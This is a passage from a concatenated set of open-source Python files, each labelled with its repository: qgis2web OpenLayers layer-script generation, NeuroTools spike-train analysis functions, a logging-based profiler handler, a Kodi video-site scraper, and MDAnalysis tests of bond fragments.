jsonSource_%(n)s.addFeatures(features_%(n)s);''' % {"n": layerName,
"crs": crsConvert,
"layerAttr": layerAttr}
if cluster:
layerCode += '''cluster_%(n)s = new ol.source.Cluster({
distance: 10,
source: jsonSource_%(n)s
});''' % {"n": layerName}
layerCode += '''var lyr_%(n)s = new ol.layer.%(t)s({
source:''' % {"n": layerName, "t": pointLayerType}
if cluster:
layerCode += 'cluster_%(n)s,' % {"n": layerName}
else:
layerCode += 'jsonSource_%(n)s,' % {"n": layerName}
layerCode += '''%(min)s %(max)s''' % {"min": minResolution,
"max": maxResolution}
if pointLayerType == "Vector":
layerCode += '''
style: style_%(n)s,''' % {"n": layerName}
else:
layerCode += '''
radius: %(hmRadius)d * 2,
gradient: %(hmRamp)s,
blur: 15,
shadow: 250,''' % {"hmRadius": hmRadius, "hmRamp": hmRamp}
if hmWeight != "":
layerCode += '''
weight: function(feature){
var weightField = '%(hmWeight)s';
var featureWeight = feature.get(weightField);
var maxWeight = %(hmWeightMax)d;
var calibratedWeight = featureWeight/maxWeight;
return calibratedWeight;
},''' % {"hmWeight": hmWeight, "hmWeightMax": hmWeightMax}
layerCode += '''
title: "%(name)s"
});''' % {"name": layer.name()}
return layerCode
elif layer.type() == layer.RasterLayer:
if layer.providerType().lower() == "wms":
source = layer.source()
opacity = layer.renderer().opacity()
d = parse_qs(source)
if "type" in d and d["type"][0] == "xyz":
return """
var lyr_%s = new ol.layer.Tile({
'title': '%s',
'type': 'base',
'opacity': %f,
%s
%s
source: new ol.source.XYZ({
attributions: [new ol.Attribution({html: '%s'})],
url: '%s'
})
});""" % (layerName, layerName, opacity, minResolution, maxResolution,
layerAttr, d["url"][0])
elif "tileMatrixSet" in d:
layerId = d["layers"][0]
url = d["url"][0]
format = d["format"][0]
style = d["styles"][0]
return '''
var projection_%(n)s = ol.proj.get('EPSG:3857');
var projectionExtent_%(n)s = projection_%(n)s.getExtent();
var size_%(n)s = ol.extent.getWidth(projectionExtent_%(n)s) / 256;
var resolutions_%(n)s = new Array(14);
var matrixIds_%(n)s = new Array(14);
for (var z = 0; z < 14; ++z) {
// generate resolutions and matrixIds arrays for this WMTS
resolutions_%(n)s[z] = size_%(n)s / Math.pow(2, z);
matrixIds_%(n)s[z] = z;
}
var lyr_%(n)s = new ol.layer.Tile({
source: new ol.source.WMTS(({
url: "%(url)s",
attributions: [new ol.Attribution({html: '%(layerAttr)s'})],
"layer": "%(layerId)s",
"TILED": "true",
matrixSet: 'EPSG:3857',
format: '%(format)s',
projection: projection_%(n)s,
tileGrid: new ol.tilegrid.WMTS({
origin: ol.extent.getTopLeft(projectionExtent_%(n)s),
resolutions: resolutions_%(n)s,
matrixIds: matrixIds_%(n)s
}),
style: '%(style)s',
wrapX: true,
"VERSION": "1.0.0",
})),
title: "%(name)s",
opacity: %(opacity)s,
%(minRes)s
%(maxRes)s
});''' % {"layerId": layerId, "url": url,
"layerAttr": layerAttr, "format": format,
"n": layerName, "name": layer.name(),
"opacity": opacity, "style": style,
"minRes": minResolution,
"maxRes": maxResolution}
else:
layers = re.search(r"layers=(.*?)(?:&|$)", source).groups(0)[0]
url = re.search(r"url=(.*?)(?:&|$)", source).groups(0)[0]
metadata = layer.metadata()
needle = "<tr><td>%s</td><td>(.+?)</td>" % (
QCoreApplication.translate("QgsWmsProvider",
"WMS Version"))
result = re.search(needle, metadata)
if result:
version = result.group(1)
else:
version = ""
return '''var lyr_%(n)s = new ol.layer.Tile({
source: new ol.source.TileWMS(({
url: "%(url)s",
attributions: [new ol.Attribution({html: '%(layerAttr)s'})],
params: {
"LAYERS": "%(layers)s",
"TILED": "true",
"VERSION": "%(version)s"},
})),
title: "%(name)s",
opacity: %(opacity)f,
%(minRes)s
%(maxRes)s
});''' % {"layers": layers, "url": url,
"layerAttr": layerAttr,
"n": layerName, "name": layer.name(),
"version": version, "opacity": opacity,
"minRes": minResolution,
"maxRes": maxResolution}
elif layer.providerType().lower() == "gdal":
provider = layer.dataProvider()
crsSrc = layer.crs()
crsDest = QgsCoordinateReferenceSystem(3857)
xform = QgsCoordinateTransform(crsSrc, crsDest)
extentRep = xform.transform(layer.extent())
sExtent = "[%f, %f, %f, %f]" % (extentRep.xMinimum(),
extentRep.yMinimum(),
extentRep.xMaximum(),
extentRep.yMaximum())
return '''var lyr_%(n)s = new ol.layer.Image({
opacity: 1,
title: "%(name)s",
%(minRes)s
%(maxRes)s
source: new ol.source.ImageStatic({
url: "./layers/%(n)s.png",
attributions: [new ol.Attribution({html: '%(layerAttr)s'})],
projection: 'EPSG:3857',
alwaysInRange: true,
//imageSize: [%(col)d, %(row)d],
imageExtent: %(extent)s
})
});''' % {"n": layerName,
"extent": sExtent,
"col": provider.xSize(),
"name": layer.name(),
"minRes": minResolution,
"maxRes": maxResolution,
"layerAttr": layerAttr,
"row": provider.ySize()}
| lucacasagrande/qgis2web | olLayerScripts.py | Python | gpl-2.0 | 21,275 |
"""
NeuroTools.analysis
==================
A collection of analysis functions that may be used by NeuroTools.signals or other packages.
.. currentmodule:: NeuroTools.analysis
Classes
-------
.. autosummary::
TuningCurve
Functions
---------
.. autosummary::
:nosignatures:
ccf
crosscorrelate
make_kernel
simple_frequency_spectrum
"""
import numpy as np
from NeuroTools import check_dependency
HAVE_MATPLOTLIB = check_dependency('matplotlib')
if HAVE_MATPLOTLIB:
import matplotlib
matplotlib.use('Agg')
else:
MATPLOTLIB_ERROR = "The matplotlib package was not detected"
HAVE_PYLAB = check_dependency('pylab')
if HAVE_PYLAB:
import pylab
else:
PYLAB_ERROR = "The pylab package was not detected"
def ccf(x, y, axis=None):
"""Fast cross correlation function based on fft.
Computes the cross-correlation function of two series.
Note that the computations are performed on anomalies (deviations from
average).
Returns the values of the cross-correlation at different lags.
Parameters
----------
x, y : 1D MaskedArrays
The two input arrays.
axis : integer, optional
Axis along which to compute (0 for rows, 1 for cols).
If `None`, the array is flattened first.
Examples
--------
>>> z = arange(5)
>>> ccf(z,z)
array([ 3.90798505e-16, -4.00000000e-01, -4.00000000e-01,
-1.00000000e-01, 4.00000000e-01, 1.00000000e+00,
4.00000000e-01, -1.00000000e-01, -4.00000000e-01,
-4.00000000e-01])
"""
assert x.ndim == y.ndim, "Inconsistent shape !"
# assert(x.shape == y.shape, "Inconsistent shape !")
if axis is None:
if x.ndim > 1:
x = x.ravel()
y = y.ravel()
npad = x.size + y.size
xanom = (x - x.mean(axis=None))
yanom = (y - y.mean(axis=None))
Fx = np.fft.fft(xanom, npad, )
Fy = np.fft.fft(yanom, npad, )
iFxy = np.fft.ifft(Fx.conj() * Fy).real
varxy = np.sqrt(np.inner(xanom, xanom) * np.inner(yanom, yanom))
else:
npad = x.shape[axis] + y.shape[axis]
if axis == 1:
if x.shape[0] != y.shape[0]:
raise ValueError("Arrays should have the same length!")
xanom = (x - x.mean(axis=1)[:, None])
yanom = (y - y.mean(axis=1)[:, None])
varxy = np.sqrt((xanom * xanom).sum(1) *
(yanom * yanom).sum(1))[:, None]
else:
if x.shape[1] != y.shape[1]:
raise ValueError("Arrays should have the same width!")
xanom = (x - x.mean(axis=0))
yanom = (y - y.mean(axis=0))
varxy = np.sqrt((xanom * xanom).sum(0) * (yanom * yanom).sum(0))
Fx = np.fft.fft(xanom, npad, axis=axis)
Fy = np.fft.fft(yanom, npad, axis=axis)
iFxy = np.fft.ifft(Fx.conj() * Fy, n=npad, axis=axis).real
# We just turn the lags into correct positions:
iFxy = np.concatenate((iFxy[len(iFxy) / 2:len(iFxy)],
iFxy[0:len(iFxy) / 2]))
return iFxy / varxy
from NeuroTools.plotting import get_display, set_labels
HAVE_PYLAB = check_dependency('pylab')
def crosscorrelate(sua1, sua2, lag=None, n_pred=1, predictor=None,
display=False, kwargs={}):
"""Cross-correlation between two series of discrete events (e.g. spikes).
Calculates the cross-correlation between
two vectors containing event times.
Returns ``(differeces, pred, norm)``. See below for details.
Adapted from original script written by Martin P. Nawrot for the
FIND MATLAB toolbox [1]_.
Parameters
----------
sua1, sua2 : 1D row or column `ndarray` or `SpikeTrain`
Event times. If sua2 == sua1, the result is the autocorrelogram.
lag : float
Lag for which relative event timing is considered
with a max difference of +/- lag. A default lag is computed
from the inter-event interval of the longer of the two sua
arrays.
n_pred : int
Number of surrogate compilations for the predictor. This
influences the total length of the predictor output array
predictor : {None, 'shuffle'}
Determines the type of bootstrap predictor to be used.
'shuffle' shuffles interevent intervals of the longer input array
and calculates relative differences with the shorter input array.
`n_pred` determines the number of repeated shufflings, resulting
differences are pooled from all repeated shufflings.
display : boolean
If True the corresponding plots will be displayed. If False,
int, int_ and norm will be returned.
kwargs : dict
Arguments to be passed to np.histogram.
Returns
-------
differences : np array
Accumulated differences of events in `sua1` minus the events in
`sua2`. Thus positive values relate to events of `sua2` that
lead events of `sua1`. Units are the same as the input arrays.
pred : np array
Accumulated differences based on the prediction method.
The length of `pred` is ``n_pred * length(differences)``. Units are
the same as the input arrays.
norm : float
Normalization factor used to scale the bin heights in `differences` and
`pred`. ``differences/norm`` and ``pred/norm`` correspond to the linear
correlation coefficient.
Examples
--------
>> crosscorrelate(np_array1, np_array2)
>> crosscorrelate(spike_train1, spike_train2)
>> crosscorrelate(spike_train1, spike_train2, lag = 150.0)
>> crosscorrelate(spike_train1, spike_train2, display=True,
kwargs={'bins':100})
See also
--------
ccf
.. [1] Meier R, Egert U, Aertsen A, Nawrot MP, "FIND - a unified framework
for neural data analysis"; Neural Netw. 2008 Oct; 21(8):1085-93.
"""
assert predictor is 'shuffle' or predictor is None, "predictor must be \
either None or 'shuffle'. Other predictors are not yet implemented."
#Check whether sua1 and sua2 are SpikeTrains or arrays
sua = []
for x in (sua1, sua2):
#if isinstance(x, SpikeTrain):
if hasattr(x, 'spike_times'):
sua.append(x.spike_times)
elif x.ndim == 1:
sua.append(x)
elif x.ndim == 2 and (x.shape[0] == 1 or x.shape[1] == 1):
sua.append(x.ravel())
else:
raise TypeError("sua1 and sua2 must be either instances of the" \
"SpikeTrain class or column/row vectors")
sua1 = sua[0]
sua2 = sua[1]
if sua1.size < sua2.size:
if lag is None:
lag = np.ceil(10*np.mean(np.diff(sua1)))
reverse = False
else:
if lag is None:
lag = np.ceil(20*np.mean(np.diff(sua2)))
sua1, sua2 = sua2, sua1
reverse = True
#construct predictor
if predictor is 'shuffle':
isi = np.diff(sua2)
sua2_ = np.array([])
for ni in xrange(1,n_pred+1):
idx = np.random.permutation(isi.size-1)
sua2_ = np.append(sua2_, np.add(np.insert(
(np.cumsum(isi[idx])), 0, 0), sua2.min() + (
np.random.exponential(isi.mean()))))
#calculate cross differences in spike times
differences = np.array([])
pred = np.array([])
for k in xrange(0, sua1.size):
differences = np.append(differences, sua1[k] - sua2[np.nonzero(
(sua2 > sua1[k] - lag) & (sua2 < sua1[k] + lag))])
if predictor == 'shuffle':
for k in xrange(0, sua1.size):
pred = np.append(pred, sua1[k] - sua2_[np.nonzero(
(sua2_ > sua1[k] - lag) & (sua2_ < sua1[k] + lag))])
if reverse is True:
differences = -differences
pred = -pred
norm = np.sqrt(sua1.size * sua2.size)
# Plot the results if display=True
if display:
subplot = get_display(display)
if not subplot or not HAVE_PYLAB:
return differences, pred, norm
else:
# Plot the cross-correlation
try:
counts, bin_edges = np.histogram(differences, **kwargs)
edge_distances = np.diff(bin_edges)
bin_centers = bin_edges[1:] - edge_distances/2
counts = counts / norm
xlabel = "Time"
ylabel = "Cross-correlation coefficient"
#NOTE: the x axis corresponds to the upper edge of each bin
subplot.plot(bin_centers, counts, label='cross-correlation', color='b')
if predictor is None:
set_labels(subplot, xlabel, ylabel)
pylab.draw()
elif predictor is 'shuffle':
# Plot the predictor
norm_ = norm * n_pred
counts_, bin_edges_ = np.histogram(pred, **kwargs)
counts_ = counts_ / norm_
subplot.plot(bin_edges_[1:], counts_, label='predictor')
subplot.legend()
pylab.draw()
except ValueError:
print "There are no correlated events within the selected lag"\
" window of %s" % lag
else:
return differences, pred, norm
def _dict_max(D):
"""For a dict containing numerical values, return the key for the
highest value. If there is more than one item with the same highest
value, return one of them (arbitrary - depends on the order produced
by the iterator).
"""
max_val = max(D.values())
for k in D:
if D[k] == max_val:
return k
def make_kernel(form, sigma, time_stamp_resolution, direction=1):
"""Creates kernel functions for convolution.
Constructs a numeric linear convolution kernel of basic shape to be used
for data smoothing (linear low pass filtering) and firing rate estimation
from single trial or trial-averaged spike trains.
Exponential and alpha kernels may also be used to represent postynaptic
currents / potentials in a linear (current-based) model.
Adapted from original script written by Martin P. Nawrot for the
FIND MATLAB toolbox [1]_ [2]_.
Parameters
----------
form : {'BOX', 'TRI', 'GAU', 'EPA', 'EXP', 'ALP'}
Kernel form. Currently implemented forms are BOX (boxcar),
TRI (triangle), GAU (gaussian), EPA (epanechnikov), EXP (exponential),
ALP (alpha function). EXP and ALP are aymmetric kernel forms and
assume optional parameter `direction`.
sigma : float
Standard deviation of the distribution associated with kernel shape.
This parameter defines the time resolution (in ms) of the kernel estimate
and makes different kernels comparable (cf. [1] for symetric kernels).
This is used here as an alternative definition to the cut-off
frequency of the associated linear filter.
time_stamp_resolution : float
Temporal resolution of input and output in ms.
direction : {-1, 1}
Asymmetric kernels have two possible directions.
The values are -1 or 1, default is 1. The
definition here is that for direction = 1 the
kernel represents the impulse response function
of the linear filter. Default value is 1.
Returns
-------
kernel : array_like
Array of kernel. The length of this array is always an odd
number to represent symmetric kernels such that the center bin
coincides with the median of the numeric array, i.e for a
triangle, the maximum will be at the center bin with equal
number of bins to the right and to the left.
norm : float
For rate estimates. The kernel vector is normalized such that
the sum of all entries equals unity sum(kernel)=1. When
estimating rate functions from discrete spike data (0/1) the
additional parameter `norm` allows for the normalization to
rate in spikes per second.
For example:
``rate = norm * scipy.signal.lfilter(kernel, 1, spike_data)``
m_idx : int
Index of the numerically determined median (center of gravity)
of the kernel function.
Examples
--------
To obtain single trial rate function of trial one should use::
r = norm * scipy.signal.fftconvolve(sua, kernel)
To obtain trial-averaged spike train one should use::
r_avg = norm * scipy.signal.fftconvolve(sua, np.mean(X,1))
where `X` is an array of shape `(l,n)`, `n` is the number of trials and
`l` is the length of each trial.
See also
--------
SpikeTrain.instantaneous_rate
SpikeList.averaged_instantaneous_rate
.. [1] Meier R, Egert U, Aertsen A, Nawrot MP, "FIND - a unified framework
for neural data analysis"; Neural Netw. 2008 Oct; 21(8):1085-93.
.. [2] Nawrot M, Aertsen A, Rotter S, "Single-trial estimation of neuronal
firing rates - from single neuron spike trains to population activity";
J. Neurosci Meth 94: 81-92; 1999.
"""
assert form.upper() in ('BOX','TRI','GAU','EPA','EXP','ALP'), "form must \
be one of either 'BOX','TRI','GAU','EPA','EXP' or 'ALP'!"
assert direction in (1,-1), "direction must be either 1 or -1"
SI_sigma = sigma / 1000. #convert to SI units (ms -> s)
SI_time_stamp_resolution = time_stamp_resolution / 1000. #convert to SI units (ms -> s)
norm = 1./SI_time_stamp_resolution
if form.upper() == 'BOX':
w = 2.0 * SI_sigma * np.sqrt(3)
width = 2 * np.floor(w / 2.0 / SI_time_stamp_resolution) + 1 # always odd number of bins
height = 1. / width
kernel = np.ones((1, width)) * height # area = 1
elif form.upper() == 'TRI':
w = 2 * SI_sigma * np.sqrt(6)
halfwidth = np.floor(w / 2.0 / SI_time_stamp_resolution)
trileft = np.arange(1, halfwidth + 2)
triright = np.arange(halfwidth, 0, -1) # odd number of bins
triangle = np.append(trileft, triright)
kernel = triangle / triangle.sum() # area = 1
elif form.upper() == 'EPA':
w = 2.0 * SI_sigma * np.sqrt(5)
halfwidth = np.floor(w / 2.0 / SI_time_stamp_resolution)
base = np.arange(-halfwidth, halfwidth + 1)
parabula = base**2
epanech = parabula.max() - parabula # inverse parabula
kernel = epanech / epanech.sum() # area = 1
elif form.upper() == 'GAU':
w = 2.0 * SI_sigma * 2.7 # > 99% of distribution weight
halfwidth = np.floor(w / 2.0 / SI_time_stamp_resolution) # always odd
base = np.arange(-halfwidth, halfwidth + 1) * SI_time_stamp_resolution
g = np.exp(-(base**2) / 2.0 / SI_sigma**2) / SI_sigma / np.sqrt(2.0 * np.pi)
kernel = g / g.sum()
elif form.upper() == 'ALP':
w = 5.0 * SI_sigma
alpha = np.arange(1, (2.0 * np.floor(w / SI_time_stamp_resolution / 2.0) + 1) + 1) * SI_time_stamp_resolution
alpha = (2.0 / SI_sigma**2) * alpha * np.exp(-alpha * np.sqrt(2) / SI_sigma)
kernel = alpha / alpha.sum() # normalization
if direction == -1:
kernel = np.flipud(kernel)
elif form.upper() == 'EXP':
w = 5.0 * SI_sigma
expo = np.arange(1, (2.0 * np.floor(w / SI_time_stamp_resolution / 2.0) + 1) + 1) * SI_time_stamp_resolution
expo = np.exp(-expo / SI_sigma)
kernel = expo / expo.sum()
if direction == -1:
kernel = np.flipud(kernel)
kernel = kernel.ravel()
m_idx = np.nonzero(kernel.cumsum() >= 0.5)[0].min()
return kernel, norm, m_idx
def simple_frequency_spectrum(x):
"""Simple frequency spectrum.
Very simple calculation of frequency spectrum with no detrending,
windowing, etc, just the first half (positive frequency components) of
abs(fft(x))
Parameters
----------
x : array_like
The input array, in the time-domain.
Returns
-------
spec : array_like
The frequency spectrum of `x`.
"""
spec = np.absolute(np.fft.fft(x))
spec = spec[:len(x) / 2] # take positive frequency components
spec /= len(x) # normalize
spec *= 2.0 # to get amplitudes of sine components, need to multiply by 2
spec[0] /= 2.0 # except for the dc component
return spec
class TuningCurve(object):
"""Class to facilitate working with tuning curves."""
def __init__(self, D=None):
"""
If `D` is a dict, it is used to give initial values to the tuning curve.
"""
self._tuning_curves = {}
self._counts = {}
if D is not None:
for k,v in D.items():
self._tuning_curves[k] = [v]
self._counts[k] = 1
self.n = 1
else:
self.n = 0
def add(self, D):
for k,v in D.items():
self._tuning_curves[k].append(v)
self._counts[k] += 1
self.n += 1
def __getitem__(self, i):
D = {}
for k,v in self._tuning_curves[k].items():
D[k] = v[i]
return D
def __repr__(self):
return "TuningCurve: %s" % self._tuning_curves
def stats(self):
"""Return the mean tuning curve with stderrs."""
mean = {}
stderr = {}
n = self.n
for k in self._tuning_curves.keys():
arr = np.array(self._tuning_curves[k])
mean[k] = arr.mean()
stderr[k] = arr.std()*n/(n-1)/np.sqrt(n)
return mean, stderr
def max(self):
"""Return the key of the max value and the max value."""
k = _dict_max(self._tuning_curves)
return k, self._tuning_curves[k]
| meduz/NeuroTools | src/analysis.py | Python | gpl-2.0 | 17,761 |
import sys
import logging
import profile
import pstats
try:
import cStringIO as StringIO
StringIO # pyflakes
except ImportError:
import StringIO
from instrumenting import utils
class BaseProfilingHandler(utils.InstrumentingHandler):
"""
Python logging handler which profiles code.
It can also optionally log profiling stats and/or dump the raw
stats to a file.
"""
def __init__(self, start=False, stop=False, functions=None,
restriction=[50], strip_dirs=True,
sort_stats=['cumulative'], print_formats=['stats'],
level=logging.NOTSET):
utils.InstrumentingHandler.__init__(self, level=level)
self.setUpProfiler()
self.start = start
self.stop = stop
self.functions = functions
self.print_formats = print_formats
def emit(self, record):
"""
Start or stop the configured profiler logging details.
If the handler is configured to start the profiler and it is
already started, a warning message is logged and it is left
running. Similarly, if the handler is configured to stop the
profiler and it is already stopped, a warning message is
logged and it is not started.
In order to avoid surprising performance impacts, if the
handler is configured such that it enables and disables the
profiler for the same single log message, an error message is
logged but the profiler is still disabled.
"""
started = False
if self.start:
if self.running():
self.log(logging.WARNING,
'Profiler %r already running, ignoring start'
% self.profiler)
else:
self.log(logging.INFO,
'Starting profiler %r' % self.profiler)
import pdb; pdb.set_trace()
self.enable()
started = True
if self.stop:
if not self.running():
self.log(logging.WARNING,
'Profiler %r not running, ignoring stop'
% self.profiler)
else:
if started:
self.log(logging.ERROR,
'Handler for profiler %r configured to start '
'and stop for the same log message'
% self.profiler)
self.log(logging.INFO,
'Stopping profiler %r' % self.profiler)
import pdb; pdb.set_trace()
self.disable()
if not started and self.print_formats:
self.log(logging.DEBUG, 'Printing profiler %r stats:\n%s'
% (self.profiler, self.log_stats()))
def log_stats(self):
stream = StringIO.StringIO()
stats = self.get_stats(stream)
if stats is None:
return
if self.strip_dirs:
stats.strip_dirs()
if self.sort_stats:
stats.sort_stats(self.sort_stats)
for method in self.print_formats:
getattr(stats, 'print_'+method)(*self.restriction)
return stream.getvalues()
# Profiler specific support
def setUpProfiler(self):
"""Set up the selected profiler."""
raise NotImplemented
def enable(self):
raise NotImplemented
def disable(self):
raise NotImplemented
def running(self):
return isinstance(sys.getprofile(), type(self.profiler))
def get_stats(self, stream):
if self.running():
self.log(logging.ERROR,
"Cannot get stats when the profiler from the "
"`profile` module is already running")
return None
import pdb; pdb.set_trace()
stats = pstats.Stats(self.profiler, stream=stream)
return stats
class ProfileHandler(BaseProfilingHandler):
"""Use the pure-python `profile` module to profile on logging events."""
def setUpProfiler(self):
if not self.functions:
raise ValueError(
'The `profile` module does not support profiling '
'an already running stack')
self.profiler = profile.Profile()
def running(self):
hook = sys.getprofile()
return (hook is self.profiler.dispatcher
and isinstance(hook.im_self, type(self.profiler)))
| rpatterson/instrumenting | src/instrumenting/profilehandler.py | Python | gpl-2.0 | 4,513 |
"""
SALTS XBMC Addon
Copyright (C) 2014 tknorris
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import re
import urlparse
import kodi
import log_utils # @UnusedImport
import dom_parser
from salts_lib import scraper_utils
from salts_lib.constants import FORCE_NO_MATCH
from salts_lib.constants import QUALITIES
from salts_lib.constants import VIDEO_TYPES
import scraper
BASE_URL = 'http://rlseries.com'
class Scraper(scraper.Scraper):
base_url = BASE_URL
def __init__(self, timeout=scraper.DEFAULT_TIMEOUT):
self.timeout = timeout
self.base_url = kodi.get_setting('%s-base_url' % (self.get_name()))
@classmethod
def provides(cls):
return frozenset([VIDEO_TYPES.SEASON, VIDEO_TYPES.EPISODE])
@classmethod
def get_name(cls):
return 'RLSeries'
def get_sources(self, video):
source_url = self.get_url(video)
hosters = []
if source_url and source_url != FORCE_NO_MATCH:
page_url = urlparse.urljoin(self.base_url, source_url)
html = self._http_get(page_url, cache_limit=1)
fragment = dom_parser.parse_dom(html, 'div', {'class': 'v_ifo'})
if fragment:
for stream_url in dom_parser.parse_dom(fragment[0], 'a', ret='href'):
host = urlparse.urlparse(stream_url).hostname
quality = scraper_utils.get_quality(video, host, QUALITIES.HIGH)
hoster = {'multi-part': False, 'host': host, 'class': self, 'quality': quality, 'views': None, 'rating': None, 'url': stream_url, 'direct': False}
hosters.append(hoster)
return hosters
def _get_episode_url(self, season_url, video):
episode_pattern = 'href="([^"]*episode-%s-[^"]*)' % (video.episode)
title_pattern = '<a[^>]*href="(?P<url>[^"]+)[^>]+title="Episode\s+\d+:\s*(?P<title>[^"]+)'
airdate_pattern = 'class="lst"[^>]+href="([^"]+)(?:[^>]+>){6}{p_day}/{p_month}/{year}<'
return self._default_get_episode_url(season_url, video, episode_pattern, title_pattern, airdate_pattern)
def search(self, video_type, title, year, season=''): # @UnusedVariable
results = []
if title and title[0].isalpha():
page_url = ['/list/?char=%s' % (title[0])]
while page_url:
page_url = urlparse.urljoin(self.base_url, page_url[0])
html = self._http_get(page_url, cache_limit=48)
fragment = dom_parser.parse_dom(html, 'ul', {'class': 'list-film-char'})
if fragment:
norm_title = scraper_utils.normalize_title(title)
for match in re.finditer('href="([^"]+)[^>]+>(.*?)</a>', fragment[0]):
match_url, match_title = match.groups()
match_title = re.sub('</?strong>', '', match_title)
match = re.search('Season\s+(\d+)', match_title, re.I)
if match:
if season and int(season) != int(match.group(1)):
continue
if norm_title in scraper_utils.normalize_title(match_title):
result = {'title': scraper_utils.cleanse_title(match_title), 'year': '', 'url': scraper_utils.pathify_url(match_url)}
results.append(result)
if results:
break
page_url = dom_parser.parse_dom(html, 'a', {'class': 'nextpostslink'}, ret='href')
return results
| JamesLinEngineer/RKMC | addons/plugin.video.salts/scrapers/rlseries_scraper.py | Python | gpl-2.0 | 4,255 |
# -*- Mode: python; tab-width: 4; indent-tabs-mode:nil; coding:utf-8 -*-
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4 fileencoding=utf-8
#
# MDAnalysis --- https://www.mdanalysis.org
# Copyright (c) 2006-2017 The MDAnalysis Development Team and contributors
# (see the file AUTHORS for the full list of names)
#
# Released under the GNU Public Licence, v2 or any higher version
#
# Please cite your use of MDAnalysis in published work:
#
# R. J. Gowers, M. Linke, J. Barnoud, T. J. E. Reddy, M. N. Melo, S. L. Seyler,
# D. L. Dotson, J. Domanski, S. Buchoux, I. M. Kenney, and O. Beckstein.
# MDAnalysis: A Python package for the rapid analysis of molecular dynamics
# simulations. In S. Benthall and S. Rostrup editors, Proceedings of the 15th
# Python in Science Conference, pages 102-109, Austin, TX, 2016. SciPy.
# doi: 10.25080/majora-629e541a-00e
#
# N. Michaud-Agrawal, E. J. Denning, T. B. Woolf, and O. Beckstein.
# MDAnalysis: A Toolkit for the Analysis of Molecular Dynamics Simulations.
# J. Comput. Chem. 32 (2011), 2319--2327, doi:10.1002/jcc.21787
#
import numpy as np
from numpy.testing import (
assert_equal,
)
import pytest
import MDAnalysis as mda
from MDAnalysis.core.topologyattrs import Bonds
from MDAnalysis.core import groups
from MDAnalysis import NoDataError
from MDAnalysisTests import make_Universe
from MDAnalysisTests.datafiles import TPR, XTC
# Also used in topology/test_guessers
def make_starshape():
u = make_Universe()
bonds = []
for seg in range(5):
segbase = seg * 25
for res in range(5):
# offset for atoms in this res
base = segbase + 5 * res
bonds.append((0 + base, 1 + base))
bonds.append((1 + base, 2 + base))
bonds.append((1 + base, 3 + base))
bonds.append((1 + base, 4 + base))
if not res == 4: # last res doesn't link onwards
bonds.append((4 + base, 5 + base))
u.add_TopologyAttr(Bonds(bonds))
return u
def case1():
return make_starshape()
def case2():
u = make_Universe()
bonds = []
for seg in range(5):
segbase = seg * 25
for res in range(5):
# offset for atoms in this res
base = segbase + 5 * res
bonds.append((0 + base, 1 + base))
bonds.append((1 + base, 2 + base))
bonds.append((2 + base, 3 + base))
bonds.append((3 + base, 4 + base))
bonds.append((1 + base, 4 + base))
if not res == 4: # last res doesn't link onwards
bonds.append((0 + base, 5 + base))
u.add_TopologyAttr(Bonds(bonds))
return u
class TestFragments(object):
r"""Use 125 atom test Universe
5 segments of 5 residues of 5 atoms
Case1
-----
Star shapes to try and test the branching prediction
o | o | o
| | | | |
o-o-o-|-o-o-o-|-o-o-o
| | | | |
o | o |x3 o
Case2
-----
4-ring pendants to test cyclic conditions
o------o------o
| | |
o o o
/ \ / \ / \
o o o o o o
\ / \ / \ /
o o o
Test ring molecules?
"""
@pytest.mark.parametrize('u', (
case1(),
case2()
))
def test_total_frags(self, u):
fragments = u.atoms.fragments
fragindices = u.atoms.fragindices
# should be 5 fragments of 25 atoms
assert len(fragments) == 5
for frag in fragments:
assert len(frag) == 25
# number of fragindices must correspond to number of atoms:
assert len(fragindices) == len(u.atoms)
# number of unique fragindices must correspond to number of fragments:
assert len(np.unique(fragindices)) == len(fragments)
# check fragindices dtype:
assert fragindices.dtype == np.intp
#check n_fragments
assert u.atoms.n_fragments == len(fragments)
@pytest.mark.parametrize('u', (
case1(),
case2()
))
def test_frag_external_ordering(self, u):
# check fragments and fragindices are sorted correctly:
for i, frag in enumerate(u.atoms.fragments):
assert frag[0].index == i * 25
assert np.unique(frag.fragindices)[0] == i
@pytest.mark.parametrize('u', (
case1(),
case2()
))
def test_frag_internal_ordering(self, u):
# check atoms are sorted within fragments and have the same fragindex:
for i, frag in enumerate(u.atoms.fragments):
assert_equal(frag.ix, np.arange(25) + i * 25)
assert len(np.unique(frag.fragindices)) == 1
assert frag.n_fragments == 1
@pytest.mark.parametrize('u', (
case1(),
case2()
))
def test_atom_access(self, u):
# check atom can access fragment and fragindex:
for at in (u.atoms[0], u.atoms[76], u.atoms[111]):
frag = at.fragment
assert isinstance(frag, groups.AtomGroup)
assert len(frag) == 25
assert at in frag
fragindex = at.fragindex
assert isinstance(fragindex, int)
with pytest.raises(AttributeError):
x = at.n_fragments
@pytest.mark.parametrize('u', (
case1(),
case2()
))
def test_atomgroup_access(self, u):
# check atomgroup can access fragments
# first 60 atoms have 3 fragments, given as tuple
# each fragment should still be 25 atoms
ag = u.atoms[:60]
frags = ag.fragments
assert len(frags) == 3
assert isinstance(frags, tuple)
for frag in frags:
assert len(frag) == 25
# same for fragindices:
fragindices = ag.fragindices
assert len(fragindices) == 60
assert len(np.unique(fragindices)) == 3
assert ag.n_fragments == 3
def test_empty_atomgroup_access(self):
ag = mda.AtomGroup([], case1())
assert ag.fragments == tuple()
assert_equal(ag.fragindices, np.array([], dtype=np.int64))
assert ag.n_fragments == 0
def test_atomgroup_fragments_nobonds_NDE(self):
# should raise NDE
u = make_Universe()
ag = u.atoms[:10]
with pytest.raises(NoDataError):
getattr(ag, 'fragments')
with pytest.raises(NoDataError):
getattr(ag, 'fragindices')
with pytest.raises(NoDataError):
getattr(ag, 'n_fragments')
def test_atom_fragment_nobonds_NDE(self):
# should raise NDE
u = make_Universe()
with pytest.raises(NoDataError):
getattr(u.atoms[10], 'fragment')
with pytest.raises(NoDataError):
getattr(u.atoms[10], 'fragindex')
def test_atomgroup_fragment_cache_invalidation_bond_making(self):
u = case1()
fgs = u.atoms.fragments
assert fgs is u.atoms._cache['fragments']
assert u.atoms._cache_key in u._cache['_valid']['fragments']
u.add_bonds((fgs[0][-1] + fgs[1][0],)) # should trigger invalidation
